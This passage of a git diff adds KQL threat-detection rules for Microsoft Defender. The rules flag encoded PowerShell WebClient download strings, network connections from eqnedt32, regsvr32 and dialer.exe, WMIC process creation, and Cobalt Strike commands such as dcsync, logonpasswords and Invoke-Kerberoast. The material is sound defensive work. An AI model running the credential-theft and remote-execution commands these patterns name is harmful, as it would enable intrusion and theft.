"uAEUAVAAuAFcARQBiA" or ProcessCommandLine contains "TgBFAFQALgBXAEUAYg" or ProcessCommandLine contains "OAEUAVAAuAFcARQBiA" or ProcessCommandLine contains "bgBlAHQALgB3AGUAQg" or ProcessCommandLine contains "4AZQB0AC4AdwBlAEIA" or ProcessCommandLine contains "uAGUAdAAuAHcAZQBCA" or ProcessCommandLine contains "TgBlAHQALgB3AGUAQg" or ProcessCommandLine contains "OAGUAdAAuAHcAZQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AGUAQg" or ProcessCommandLine contains "4ARQB0AC4AdwBlAEIA" or ProcessCommandLine contains "uAEUAdAAuAHcAZQBCA" or ProcessCommandLine contains "TgBFAHQALgB3AGUAQg" or ProcessCommandLine contains "OAEUAdAAuAHcAZQBCA" or ProcessCommandLine contains "bgBlAFQALgB3AGUAQg" or ProcessCommandLine contains "4AZQBUAC4AdwBlAEIA" or ProcessCommandLine contains "uAGUAVAAuAHcAZQBCA" or ProcessCommandLine contains "TgBlAFQALgB3AGUAQg" or ProcessCommandLine contains "OAGUAVAAuAHcAZQBCA" or ProcessCommandLine contains "bgBFAFQALgB3AGUAQg" or ProcessCommandLine contains "4ARQBUAC4AdwBlAEIA" or ProcessCommandLine contains "uAEUAVAAuAHcAZQBCA" or ProcessCommandLine contains "TgBFAFQALgB3AGUAQg" or ProcessCommandLine contains "OAEUAVAAuAHcAZQBCA" or ProcessCommandLine contains "bgBlAHQALgBXAGUAQg" or ProcessCommandLine contains "4AZQB0AC4AVwBlAEIA" or ProcessCommandLine contains "uAGUAdAAuAFcAZQBCA" or ProcessCommandLine contains "TgBlAHQALgBXAGUAQg" or ProcessCommandLine contains "OAGUAdAAuAFcAZQBCA" or ProcessCommandLine contains "bgBFAHQALgBXAGUAQg" or ProcessCommandLine contains "4ARQB0AC4AVwBlAEIA" or ProcessCommandLine contains "uAEUAdAAuAFcAZQBCA" or ProcessCommandLine contains "TgBFAHQALgBXAGUAQg" or ProcessCommandLine contains "OAEUAdAAuAFcAZQBCA" or ProcessCommandLine contains "bgBlAFQALgBXAGUAQg" or ProcessCommandLine contains "4AZQBUAC4AVwBlAEIA" or ProcessCommandLine contains "uAGUAVAAuAFcAZQBCA" or ProcessCommandLine contains "TgBlAFQALgBXAGUAQg" or ProcessCommandLine contains "OAGUAVAAuAFcAZQBCA" or ProcessCommandLine contains "bgBFAFQALgBXAGUAQg" or ProcessCommandLine contains "4ARQBUAC4AVwBlAEIA" or ProcessCommandLine contains "uAEUAVAAuAFcAZQBCA" or ProcessCommandLine contains "TgBFAFQALgBXAGUAQg" or ProcessCommandLine contains "OAEUAVAAuAFcAZQBCA" or ProcessCommandLine contains "bgBlAHQALgB3AEUAQg" or ProcessCommandLine contains "4AZQB0AC4AdwBFAEIA" or ProcessCommandLine contains "uAGUAdAAuAHcARQBCA" or ProcessCommandLine contains "TgBlAHQALgB3AEUAQg" or ProcessCommandLine contains "OAGUAdAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AEUAQg" or ProcessCommandLine contains "4ARQB0AC4AdwBFAEIA" or ProcessCommandLine contains "uAEUAdAAuAHcARQBCA" or ProcessCommandLine contains "TgBFAHQALgB3AEUAQg" or ProcessCommandLine contains "OAEUAdAAuAHcARQBCA" or ProcessCommandLine contains "bgBlAFQALgB3AEUAQg" or ProcessCommandLine contains "uAGUAVAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAFQALgB3AEUAQg" or ProcessCommandLine contains "4ARQBUAC4AdwBFAEIA" or ProcessCommandLine contains "uAEUAVAAuAHcARQBCA" or ProcessCommandLine contains "TgBFAFQALgB3AEUAQg" or ProcessCommandLine contains "OAEUAVAAuAHcARQBCA" or ProcessCommandLine contains "TgBlAHQALgBXAEUAQg" or ProcessCommandLine contains "4AZQB0AC4AVwBFAEIA" or ProcessCommandLine contains "OAGUAdAAuAFcARQBCA" or ProcessCommandLine contains "bgBFAHQALgBXAEUAQg" or ProcessCommandLine contains "4ARQB0AC4AVwBFAEIA" or ProcessCommandLine contains "uAEUAdAAuAFcARQBCA" or ProcessCommandLine contains "TgBFAHQALgBXAEUAQg" or ProcessCommandLine contains "OAEUAdAAuAFcARQBCA" or ProcessCommandLine contains "bgBlAFQALgBXAEUAQg" or ProcessCommandLine contains "4AZQBUAC4AVwBFAEIA" or ProcessCommandLine contains "uAGUAVAAuAFcARQBCA" or ProcessCommandLine contains "TgBlAFQALgBXAEUAQg" or ProcessCommandLine contains "OAGUAVAAuAFcARQBCA" or ProcessCommandLine contains "bgBFAFQALgBXAEUAQg" or ProcessCommandLine contains "4ARQBUAC4AVwBFAEIA" or ProcessCommandLine contains "uAEUAVAAuAFcARQBCA") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Execution/network_connection_initiated_by_eqnedt32_exe.kql b/KQL/rules/Execution/network_connection_initiated_by_eqnedt32_exe.kql new file mode 100644 index 00000000..8ac9c9e2 --- /dev/null +++ b/KQL/rules/Execution/network_connection_initiated_by_eqnedt32_exe.kql @@ -0,0 +1,12 @@ +// Title: Network Connection Initiated By Eqnedt32.EXE +// Author: Max Altgelt (Nextron Systems) +// Date: 2022-04-14 +// Level: high +// Description: Detects network connections from the Equation Editor process "eqnedt32.exe". +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1203 +// False Positives: +// - Unlikely + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\eqnedt32.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/network_connection_initiated_by_regsvr32_exe.kql b/KQL/rules/Execution/network_connection_initiated_by_regsvr32_exe.kql new file mode 100644 index 00000000..e211f769 --- /dev/null +++ b/KQL/rules/Execution/network_connection_initiated_by_regsvr32_exe.kql @@ -0,0 +1,10 @@ +// Title: Network Connection Initiated By Regsvr32.EXE +// Author: Dmitriy Lifanov, oscd.community +// Date: 2019-10-25 +// Level: medium +// Description: Detects a network connection initiated by "Regsvr32.exe" +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1559.001, attack.defense-evasion, attack.t1218.010 + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\regsvr32.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/new_application_in_appcompat.kql b/KQL/rules/Execution/new_application_in_appcompat.kql new file mode 100644 index 00000000..a149633e --- /dev/null +++ b/KQL/rules/Execution/new_application_in_appcompat.kql @@ -0,0 +1,14 @@ +// Title: New Application in AppCompat +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-05-02 +// Level: informational +// Description: A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002 +// False Positives: +// - This rule is to explore new applications on an endpoint. False positives depends on the organization. +// - Newly setup system. +// - Legitimate installation of new application. + +DeviceRegistryEvents +| where RegistryKey endswith "\\AppCompatFlags\\Compatibility Assistant\\Store*" \ No newline at end of file diff --git a/KQL/rules/Execution/new_process_created_via_wmic_exe.kql b/KQL/rules/Execution/new_process_created_via_wmic_exe.kql new file mode 100644 index 00000000..d3ce7551 --- /dev/null +++ b/KQL/rules/Execution/new_process_created_via_wmic_exe.kql @@ -0,0 +1,10 @@ +// Title: New Process Created Via Wmic.EXE +// Author: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community +// Date: 2019-01-16 +// Level: medium +// Description: Detects new process creation using WMIC via the "process call create" flag +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047, car.2016-03-002 + +DeviceProcessEvents +| where (ProcessCommandLine contains "process" and ProcessCommandLine contains "call" and ProcessCommandLine contains "create") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql b/KQL/rules/Execution/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql new file mode 100644 index 00000000..48a354d5 --- /dev/null +++ b/KQL/rules/Execution/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql @@ -0,0 +1,12 @@ +// Title: New Virtual Smart Card Created Via TpmVscMgr.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-15 +// Level: medium +// Description: Detects execution of "Tpmvscmgr.exe" to create a new virtual smart card. +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Legitimate usage by an administrator + +DeviceProcessEvents +| where ProcessCommandLine contains "create" and (FolderPath endswith "\\tpmvscmgr.exe" and ProcessVersionInfoOriginalFileName =~ "TpmVscMgr.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/nodejs_execution_of_javascript_file.kql b/KQL/rules/Execution/nodejs_execution_of_javascript_file.kql new file mode 100644 index 00000000..b31ae7fb --- /dev/null +++ b/KQL/rules/Execution/nodejs_execution_of_javascript_file.kql @@ -0,0 +1,16 @@ +// Title: NodeJS Execution of JavaScript File +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-04-21 +// Level: low +// Description: Detects execution of JavaScript or JSC files using NodeJs binary node.exe, that could be potentially suspicious. +Node.js is a popular open-source JavaScript runtime that runs code outside browsers and is widely used for both frontend and backend development. +Adversaries have been observed abusing Node.js to disguise malware as legitimate processes, evade security defenses, and maintain persistence within target systems. +Because Node.js is commonly used, this rule may generate false positives in some environments. However, if such activity is unusual in your environment, it is highly suspicious and warrants immediate investigation. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.007 +// False Positives: +// - Legitimate use of node.exe to execute JavaScript or JSC files on your environment + +DeviceProcessEvents +| where ProcessCommandLine contains ".js" and (FolderPath endswith "\\node.exe" or ProcessVersionInfoOriginalFileName =~ "node.exe" or ProcessVersionInfoProductName =~ "Node.js") \ No newline at end of file diff --git a/KQL/rules/Execution/nohup_execution.kql b/KQL/rules/Execution/nohup_execution.kql new file mode 100644 index 00000000..a579be68 --- /dev/null +++ b/KQL/rules/Execution/nohup_execution.kql @@ -0,0 +1,12 @@ +// Title: Nohup Execution +// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io +// Date: 2022-06-06 +// Level: medium +// Description: Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.004 +// False Positives: +// - Administrators or installed processes that leverage nohup + +DeviceProcessEvents +| where FolderPath endswith "/nohup" \ No newline at end of file diff --git a/KQL/rules/Execution/non_interactive_powershell_process_spawned.kql b/KQL/rules/Execution/non_interactive_powershell_process_spawned.kql new file mode 100644 index 00000000..cad06e5b --- /dev/null +++ b/KQL/rules/Execution/non_interactive_powershell_process_spawned.kql @@ -0,0 +1,12 @@ +// Title: Non Interactive PowerShell Process Spawned +// Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) +// Date: 2019-09-12 +// Level: low +// Description: Detects non-interactive PowerShell activity by looking at the "powershell" process with a non-user GUI process such as "explorer.exe" as a parent. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Likely. Many admin scripts and tools leverage PowerShell in their BAT or VB scripts which may trigger this rule often. It is best to add additional filters or use this to hunt for anomalies + +DeviceProcessEvents +| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (not(((InitiatingProcessFolderPath endswith ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\CompatTelRunner.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\explorer.exe") or InitiatingProcessFolderPath =~ ":\\$WINDOWS.~BT\\Sources\\SetupHost.exe"))) and (not(((InitiatingProcessFolderPath contains ":\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_" and InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe") or (InitiatingProcessCommandLine contains " --ms-enable-electron-run-as-node " and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe")))) \ No newline at end of file diff --git a/KQL/rules/Execution/office_application_initiated_network_connection_to_non_local_ip.kql b/KQL/rules/Execution/office_application_initiated_network_connection_to_non_local_ip.kql new file mode 100644 index 00000000..ae80ce24 --- /dev/null +++ b/KQL/rules/Execution/office_application_initiated_network_connection_to_non_local_ip.kql @@ -0,0 +1,17 @@ +// Title: Office Application Initiated Network Connection To Non-Local IP +// Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-11-10 +// Level: medium +// Description: Detects an office application (Word, Excel, PowerPoint) that initiate a network connection to a non-private IP addresses. +This rule aims to detect traffic similar to one seen exploited in CVE-2021-42292. +This rule will require an initial baseline and tuning that is specific to your organization. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1203 +// False Positives: +// - You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains. +// - Office documents commonly have templates that refer to external addresses, like "sharepoint.ourcompany.com" may have to be tuned. +// - It is highly recommended to baseline your activity and tune out common business use cases. + +DeviceNetworkEvents +| where (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (not(((RemoteUrl endswith ".deploy.static.akamaitechnologies.com" and RemotePort == 443 and Protocol =~ "tcp") or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or ((ipv4_is_in_range(RemoteIP, "13.107.4.0/22") or ipv4_is_in_range(RemoteIP, "13.107.6.152/31") or ipv4_is_in_range(RemoteIP, "13.107.18.10/31") or ipv4_is_in_range(RemoteIP, "13.107.42.0/23") or ipv4_is_in_range(RemoteIP, "13.107.128.0/22") or ipv4_is_in_range(RemoteIP, "23.35.224.0/20") or ipv4_is_in_range(RemoteIP, "23.53.40.0/22") or ipv4_is_in_range(RemoteIP, "23.103.160.0/20") or ipv4_is_in_range(RemoteIP, "23.216.76.0/22") or ipv4_is_in_range(RemoteIP, "40.96.0.0/13") or ipv4_is_in_range(RemoteIP, "40.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.96.0.0/14") or ipv4_is_in_range(RemoteIP, "131.253.33.215/32") or ipv4_is_in_range(RemoteIP, "132.245.0.0/16") or ipv4_is_in_range(RemoteIP, "150.171.32.0/22") or ipv4_is_in_range(RemoteIP, "204.79.197.215/32") or ipv4_is_in_range(RemoteIP, "2603:1006::/40") or ipv4_is_in_range(RemoteIP, "2603:1016::/36") or ipv4_is_in_range(RemoteIP, "2603:1026::/36") or ipv4_is_in_range(RemoteIP, "2603:1036::/36") or ipv4_is_in_range(RemoteIP, "2603:1046::/36") or ipv4_is_in_range(RemoteIP, "2603:1056::/36") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::152/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::153/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::10/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::11/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:d::10/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:d::11/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:8f0::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:900::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::152/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::153/128")) and (RemotePort in~ ("80", "443"))) or ((ipv4_is_in_range(RemoteIP, "13.107.6.152/31") or ipv4_is_in_range(RemoteIP, "13.107.18.10/31") or ipv4_is_in_range(RemoteIP, "13.107.128.0/22") or ipv4_is_in_range(RemoteIP, "23.103.160.0/20") or ipv4_is_in_range(RemoteIP, "40.96.0.0/13") or ipv4_is_in_range(RemoteIP, "40.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.96.0.0/14") or ipv4_is_in_range(RemoteIP, "131.253.33.215/32") or ipv4_is_in_range(RemoteIP, "132.245.0.0/16") or ipv4_is_in_range(RemoteIP, "150.171.32.0/22") or ipv4_is_in_range(RemoteIP, "204.79.197.215/32") or ipv4_is_in_range(RemoteIP, "2603:1006::/40") or ipv4_is_in_range(RemoteIP, "2603:1016::/36") or ipv4_is_in_range(RemoteIP, "2603:1026::/36") or ipv4_is_in_range(RemoteIP, "2603:1036::/36") or ipv4_is_in_range(RemoteIP, "2603:1046::/36") or ipv4_is_in_range(RemoteIP, "2603:1056::/36") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::152/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::153/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::10/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::11/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:d::10/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:d::11/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:8f0::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:900::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::152/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::153/128")) and (RemotePort in~ ("143", "587", "993", "995")) and Protocol =~ "tcp") or ((ipv4_is_in_range(RemoteIP, "40.92.0.0/15") or ipv4_is_in_range(RemoteIP, "40.107.0.0/16") or ipv4_is_in_range(RemoteIP, "52.100.0.0/14") or ipv4_is_in_range(RemoteIP, "52.238.78.88/32") or ipv4_is_in_range(RemoteIP, "104.47.0.0/17") or ipv4_is_in_range(RemoteIP, "2a01:111:f400::/48") or ipv4_is_in_range(RemoteIP, "2a01:111:f403::/48")) and RemotePort == 443) or ((ipv4_is_in_range(RemoteIP, "40.92.0.0/15") or ipv4_is_in_range(RemoteIP, "40.107.0.0/16") or ipv4_is_in_range(RemoteIP, "52.100.0.0/14") or ipv4_is_in_range(RemoteIP, "52.238.78.88/32") or ipv4_is_in_range(RemoteIP, "104.47.0.0/17") or ipv4_is_in_range(RemoteIP, "2a01:111:f400::/48") or ipv4_is_in_range(RemoteIP, "2a01:111:f403::/48")) and RemotePort == 25) or (ipv4_is_in_range(RemoteIP, "2.16.56.0/23") or ipv4_is_in_range(RemoteIP, "2.17.248.0/21") or ipv4_is_in_range(RemoteIP, "13.107.240.0/21") or ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "23.61.224.0/20") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.72.0.0/13") or ipv4_is_in_range(RemoteIP, "23.3.88.0/22") or ipv4_is_in_range(RemoteIP, "23.216.132.0/22") or ipv4_is_in_range(RemoteIP, "40.76.0.0/14") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "51.142.136.0/22") or ipv4_is_in_range(RemoteIP, "52.160.0.0/11") or ipv4_is_in_range(RemoteIP, "95.101.96.0/21") or ipv4_is_in_range(RemoteIP, "204.79.197.0/24")) or ((ipv4_is_in_range(RemoteIP, "13.107.6.171/32") or ipv4_is_in_range(RemoteIP, "13.107.18.15/32") or ipv4_is_in_range(RemoteIP, "13.107.140.6/32") or ipv4_is_in_range(RemoteIP, "20.64.0.0/10") or ipv4_is_in_range(RemoteIP, "52.108.0.0/14") or ipv4_is_in_range(RemoteIP, "52.244.37.168/32") or ipv4_is_in_range(RemoteIP, "2603:1006:1400::/40") or ipv4_is_in_range(RemoteIP, "2603:1016:2400::/40") or ipv4_is_in_range(RemoteIP, "2603:1026:2400::/40") or ipv4_is_in_range(RemoteIP, "2603:1036:2400::/40") or ipv4_is_in_range(RemoteIP, "2603:1046:1400::/40") or ipv4_is_in_range(RemoteIP, "2603:1056:1400::/40") or ipv4_is_in_range(RemoteIP, "2603:1063:2000::/38") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::15/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:8fc::6/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::171/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:2000::a83e:3019/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:2002::8975:2d79/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:2002::8975:2da8/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:7000::6fdd:6cd5/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:a004::bfeb:88cf/128")) and (RemotePort in~ ("80", "443")) and Protocol =~ "tcp") or ((ipv4_is_in_range(RemoteIP, "172.128.0.0/10") or ipv4_is_in_range(RemoteIP, "20.20.32.0/19") or ipv4_is_in_range(RemoteIP, "20.103.156.88/32") or ipv4_is_in_range(RemoteIP, "20.190.128.0/18") or ipv4_is_in_range(RemoteIP, "20.231.128.0/19") or ipv4_is_in_range(RemoteIP, "40.126.0.0/18") or ipv4_is_in_range(RemoteIP, "57.150.0.0/15") or ipv4_is_in_range(RemoteIP, "2603:1006:2000::/48") or ipv4_is_in_range(RemoteIP, "2603:1007:200::/48") or ipv4_is_in_range(RemoteIP, "2603:1016:1400::/48") or ipv4_is_in_range(RemoteIP, "2603:1017::/48") or ipv4_is_in_range(RemoteIP, "2603:1026:3000::/48") or ipv4_is_in_range(RemoteIP, "2603:1027:1::/48") or ipv4_is_in_range(RemoteIP, "2603:1036:3000::/48") or ipv4_is_in_range(RemoteIP, "2603:1037:1::/48") or ipv4_is_in_range(RemoteIP, "2603:1046:2000::/48") or ipv4_is_in_range(RemoteIP, "2603:1047:1::/48") or ipv4_is_in_range(RemoteIP, "2603:1056:2000::/48") or ipv4_is_in_range(RemoteIP, "2603:1057:2::/48")) and (RemotePort in~ ("80", "443")) and Protocol =~ "tcp") or ((ipv4_is_in_range(RemoteIP, "13.64.0.0/11") or ipv4_is_in_range(RemoteIP, "13.107.6.192/32") or ipv4_is_in_range(RemoteIP, "13.107.9.192/32") or ipv4_is_in_range(RemoteIP, "13.89.179.14/32") or ipv4_is_in_range(RemoteIP, "20.40.0.0/14") or ipv4_is_in_range(RemoteIP, "20.48.0.0/12") or ipv4_is_in_range(RemoteIP, "20.64.0.0/12") or ipv4_is_in_range(RemoteIP, "52.123.0.0/16") or ipv4_is_in_range(RemoteIP, "52.108.0.0/14") or ipv4_is_in_range(RemoteIP, "52.136.0.0/13") or ipv4_is_in_range(RemoteIP, "57.150.0.0/15") or ipv4_is_in_range(RemoteIP, "80.239.150.67/32") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::192/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::192/128")) and RemotePort == 443 and Protocol =~ "tcp") or ((ipv4_is_in_range(RemoteIP, "13.107.136.0/22") or ipv4_is_in_range(RemoteIP, "40.108.128.0/17") or ipv4_is_in_range(RemoteIP, "52.104.0.0/14") or ipv4_is_in_range(RemoteIP, "104.146.128.0/17") or ipv4_is_in_range(RemoteIP, "150.171.40.0/22") or ipv4_is_in_range(RemoteIP, "2603:1061:1300::/40") or ipv4_is_in_range(RemoteIP, "2620:1ec:8f8::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:908::/46") or ipv4_is_in_range(RemoteIP, "2a01:111:f402::/48")) and (RemotePort in~ ("80", "443")) and Protocol =~ "tcp")))) \ No newline at end of file diff --git a/KQL/rules/Execution/operator_bloopers_cobalt_strike_commands.kql b/KQL/rules/Execution/operator_bloopers_cobalt_strike_commands.kql new file mode 100644 index 00000000..81433cb7 --- /dev/null +++ b/KQL/rules/Execution/operator_bloopers_cobalt_strike_commands.kql @@ -0,0 +1,10 @@ +// Title: Operator Bloopers Cobalt Strike Commands +// Author: _pete_0, TheDFIRReport +// Date: 2022-05-06 +// Level: high +// Description: Detects use of Cobalt Strike commands accidentally entered in the CMD shell +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.003, stp.1u + +DeviceProcessEvents +| where ((ProcessCommandLine contains "psinject" or ProcessCommandLine contains "spawnas" or ProcessCommandLine contains "make_token" or ProcessCommandLine contains "remote-exec" or ProcessCommandLine contains "rev2self" or ProcessCommandLine contains "dcsync" or ProcessCommandLine contains "logonpasswords" or ProcessCommandLine contains "execute-assembly" or ProcessCommandLine contains "getsystem") and (ProcessCommandLine startswith "cmd " or ProcessCommandLine startswith "cmd.exe" or ProcessCommandLine startswith "c:\\windows\\system32\\cmd.exe")) and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/operator_bloopers_cobalt_strike_modules.kql b/KQL/rules/Execution/operator_bloopers_cobalt_strike_modules.kql new file mode 100644 index 00000000..0a14b55a --- /dev/null +++ b/KQL/rules/Execution/operator_bloopers_cobalt_strike_modules.kql @@ -0,0 +1,10 @@ +// Title: Operator Bloopers Cobalt Strike Modules +// Author: _pete_0, TheDFIRReport +// Date: 2022-05-06 +// Level: high +// Description: Detects Cobalt Strike module/commands accidentally entered in CMD shell +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.003 + +DeviceProcessEvents +| where (ProcessCommandLine contains "Invoke-UserHunter" or ProcessCommandLine contains "Invoke-ShareFinder" or ProcessCommandLine contains "Invoke-Kerberoast" or ProcessCommandLine contains "Invoke-SMBAutoBrute" or ProcessCommandLine contains "Invoke-Nightmare" or ProcessCommandLine contains "zerologon" or ProcessCommandLine contains "av_query") and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/osacompile_execution_by_potentially_suspicious_applet_osascript.kql b/KQL/rules/Execution/osacompile_execution_by_potentially_suspicious_applet_osascript.kql new file mode 100644 index 00000000..71ff2c4b --- /dev/null +++ b/KQL/rules/Execution/osacompile_execution_by_potentially_suspicious_applet_osascript.kql @@ -0,0 +1,10 @@ +// Title: Osacompile Execution By Potentially Suspicious Applet/Osascript +// Author: Sohan G (D4rkCiph3r), Red Canary (Idea) +// Date: 2023-04-03 +// Level: medium +// Description: Detects potential suspicious applet or osascript executing "osacompile". +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.002 + +DeviceProcessEvents +| where ProcessCommandLine contains "osacompile" and (InitiatingProcessFolderPath endswith "/applet" or InitiatingProcessFolderPath endswith "/osascript") \ No newline at end of file diff --git a/KQL/rules/Execution/osacompile_run_only_execution.kql b/KQL/rules/Execution/osacompile_run_only_execution.kql new file mode 100644 index 00000000..0f2d1440 --- /dev/null +++ b/KQL/rules/Execution/osacompile_run_only_execution.kql @@ -0,0 +1,10 @@ +// Title: OSACompile Run-Only Execution +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-01-31 +// Level: high +// Description: Detects potential suspicious run-only executions compiled using OSACompile +// MITRE Tactic: Execution +// Tags: attack.t1059.002, attack.execution + +DeviceProcessEvents +| where ProcessCommandLine contains "osacompile" and ProcessCommandLine contains " -x " and ProcessCommandLine contains " -e " \ No newline at end of file diff --git a/KQL/rules/Execution/outbound_network_connection_initiated_by_microsoft_dialer.kql b/KQL/rules/Execution/outbound_network_connection_initiated_by_microsoft_dialer.kql new file mode 100644 index 00000000..5676d2ab --- /dev/null +++ b/KQL/rules/Execution/outbound_network_connection_initiated_by_microsoft_dialer.kql @@ -0,0 +1,15 @@ +// Title: Outbound Network Connection Initiated By Microsoft Dialer +// Author: CertainlyP +// Date: 2024-04-26 +// Level: high +// Description: Detects outbound network connection initiated by Microsoft Dialer. +The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer. +This is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is "Rhadamanthys" + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.command-and-control, attack.t1071.001 +// False Positives: +// - In Modern Windows systems, unable to see legitimate usage of this process, However, if an organization has legitimate purpose for this there can be false positives. + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith ":\\Windows\\System32\\dialer.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/KQL/rules/Execution/outlook_enableunsafeclientmailrules_setting_enabled.kql b/KQL/rules/Execution/outlook_enableunsafeclientmailrules_setting_enabled.kql new file mode 100644 index 00000000..4bb6b241 --- /dev/null +++ b/KQL/rules/Execution/outlook_enableunsafeclientmailrules_setting_enabled.kql @@ -0,0 +1,10 @@ +// Title: Outlook EnableUnsafeClientMailRules Setting Enabled +// Author: 